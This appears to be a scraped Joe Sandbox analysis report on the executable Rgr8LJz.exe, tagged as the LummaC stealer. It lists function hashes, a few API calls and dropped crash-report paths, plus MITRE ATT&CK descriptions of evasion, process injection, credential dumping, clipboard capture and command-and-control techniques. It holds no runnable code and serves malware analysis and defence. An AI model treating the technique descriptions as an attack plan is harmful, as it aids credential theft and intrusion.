Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d7ec3fb741164c6b086c121e771e9bbdb6f23c90b65fb67502ae1d01e9b9ad5
Instruction ID: ca4e224e48b7b6b3f0d92a6c26b2de209aa5bf89f63b2c51ae1ca0d16e5a92f7
Opcode Fuzzy Hash: 5d7ec3fb741164c6b086c121e771e9bbdb6f23c90b65fb67502ae1d01e9b9ad5
Instruction Fuzzy Hash: A22125B59053008FE314DF25C88473BBBA1FBD6324F14892DEAD45B391C3398C668B96

Function 004302A2 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82ede72faed8d0e0d65a8774a79d530a3fccf7c3cbb5affee25cd20285237671
Instruction ID: c30aa0826e31a5ec9d03a65ad24ec0477327c06a4cf712a720f351f231f22fd4
Opcode Fuzzy Hash: 82ede72faed8d0e0d65a8774a79d530a3fccf7c3cbb5affee25cd20285237671
Instruction Fuzzy Hash: AE0128181083D18BD3068F3584F0773FFE08B27205F1856AED8F60B783D2299809D756

Function 00439F60 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 572702d40469a0455110346bd0a34853be8aa84000b8a65b0ed43730a360cce9
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 2811E933A091D50EC3168D3C84005A5BFA30AD7234F5D939AF4B4DB2D6D6278D8AC359

Function 0042C6C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aed09eba0198d3af2cb5a31df0e42bb740a004cd13f463aa86e543f3cf3c3b2
Instruction ID: e8403b85e2a432364196cc8d397c8c6f34afb7c5feff15400e265a079678c806
Opcode Fuzzy Hash: 8aed09eba0198d3af2cb5a31df0e42bb740a004cd13f463aa86e543f3cf3c3b2
Instruction Fuzzy Hash: D001B1F5701B1287DB209E55A5C072FB2A86F90708F08103EE84857342DB7DEC09C6D9

Function 004190A6 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a240cc4b8602228bdc33db2548fc90bce60789c53bc3044e8df2acfd71aab881
Instruction ID: 471acbe3857a3ee487153fe42bff7cf0d5251a8d5e1f9c6e73e806715be9489c
Opcode Fuzzy Hash: a240cc4b8602228bdc33db2548fc90bce60789c53bc3044e8df2acfd71aab881
Instruction Fuzzy Hash: C501BCB8808240EFE7209F21EC1AB5F72A0FF9630AF41487CE04951061D7B55524CF6B

Function 00440740 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2a5bda636529673baebab7d13b663edaa42ff030a1fec58509b0a54874dd4870
Instruction ID: c81af8e4f88ddb2bbcd93d1cf659ed5b34b05b14cd75326543f9902f1ebb7ec7
Opcode Fuzzy Hash: 2a5bda636529673baebab7d13b663edaa42ff030a1fec58509b0a54874dd4870
Instruction Fuzzy Hash: EFF0D67A510204ABA2105B45DC40C37736DFB9A768F10032AF658122A1E632BD229AAA

Function 004176DC Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 149486ae1646ee9ee6b39ac826587789bbc2e6fc7f3a7624b0f95ebea84c07d8
Instruction ID: c722ca1fef59ae76c86a091f275479ba86c23658495a79ee67cb7c2ec793179f
Opcode Fuzzy Hash: 149486ae1646ee9ee6b39ac826587789bbc2e6fc7f3a7624b0f95ebea84c07d8
Instruction Fuzzy Hash: 41F044786082009AD2218F25C98177BB3B2B7DA320F64561AF5A8532E4DB34BC86CB1D

Function 0041F8A0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: d3256a788861ec45541ccc273b9751777cd6ad77e890cc4870a78a3601f6d248
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 18D0A7719487A10E97588D3804E04B7FBE8E947612B1814AFE4D5E7205D334DC4B469C

Function 00427ED0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9711dcbe052a7cf0e6fc386807e67aa228963699324a1a2b4f84db12eba8c54b
Instruction ID: 03959a2d445304b97661840c97c125981752ef04dcb3ca99ac6b0d8e7128c9cd
Opcode Fuzzy Hash: 9711dcbe052a7cf0e6fc386807e67aa228963699324a1a2b4f84db12eba8c54b
Instruction Fuzzy Hash: E5D0C97090C2199AE3509E50D84CF77B9BCE747344F51541CA188AB191DA79984497E9

Function 0042BFE2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 223COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042C0DD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042C247

Strings

K, xrefs: 0042C1C2
{L, xrefs: 0042C1BB

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: K${L
API String ID: 237503144-1439412892
Opcode ID: 8ec726ef0270f7d10e0fc5e2ac0c06c676bfc8b07c1da16851a1ab8e1015b852
Instruction ID: 2f64d532984c54c325b51a17feddbe73bd4eeb8bf581174a65b293e729101e1e
Opcode Fuzzy Hash: 8ec726ef0270f7d10e0fc5e2ac0c06c676bfc8b07c1da16851a1ab8e1015b852
Instruction Fuzzy Hash: 48712EB4A01719AFD718CF6AC98175ABFB1FB48310F1592ADE046AF795D774A802CBC0

Function 00425C0A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00425CD3
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00425E10

Strings

j^B, xrefs: 00425E64

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: j^B
API String ID: 237503144-116115330
Opcode ID: ceda411dc1f72fa69704c63e557b3108d8992cf7afcb81e65eebd6537ba04391
Instruction ID: f6e576cbcae3cd2aea29b4fd36c5fd1c2932e3a820043a6390e4a0bd8cd2eecd
Opcode Fuzzy Hash: ceda411dc1f72fa69704c63e557b3108d8992cf7afcb81e65eebd6537ba04391
Instruction Fuzzy Hash: 5C51E1B4A003109FEB14DF69C98A75B7FB1FB41310F1581ADD884AF386C77988068BD6

Function 00437F26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00437F56
GetSystemMetrics.USER32 ref: 00437F65

Strings

, xrefs: 00438013

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 380cf557e3824bb10fcf75af779cd47624ae9854a3db7355ba2ab22fea62fb4a
Instruction ID: c94dce4cb33ace140ff7f82b221f5b34fe923c75b730cfbe3e97d3c31471d389
Opcode Fuzzy Hash: 380cf557e3824bb10fcf75af779cd47624ae9854a3db7355ba2ab22fea62fb4a
Instruction Fuzzy Hash: A131A2B49243548FDB00EF78D98561EBBF4BB89304F02452EE498DB364D770A948CF86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Rgr8LJz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Rgr8LJz.exe_41612d26a46917a1f598b16129f1566561cb9f0_36f8f177_c1019844-5e7a-4c7a-884e-1dfe5128f5e8\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9626.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER975F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER978F.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
Rgr8LJz.exe

Function 03087F21 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 0308809E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 015327E8 Relevance: 1.8, APIs: 1, Instructions: 252
memoryCOMMON

Function 01530668 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 0043CF10 Relevance: 28.8, APIs: 12, Strings: 4, Instructions: 802
memorycomCOMMON

Function 032C1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Function 00425828 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 274
COMMON

Function 0040D0FF Relevance: 15.6, APIs: 2, Strings: 8, Instructions: 643
COMMON

Function 00418BDB Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 334
COMMON

Function 0043852B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113
COMMON

Function 0041732D Relevance: 4.1, Strings: 3, Instructions: 395
COMMON

Function 00442191 Relevance: 3.9, Strings: 3, Instructions: 149
COMMON

Function 004308DA Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 369
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre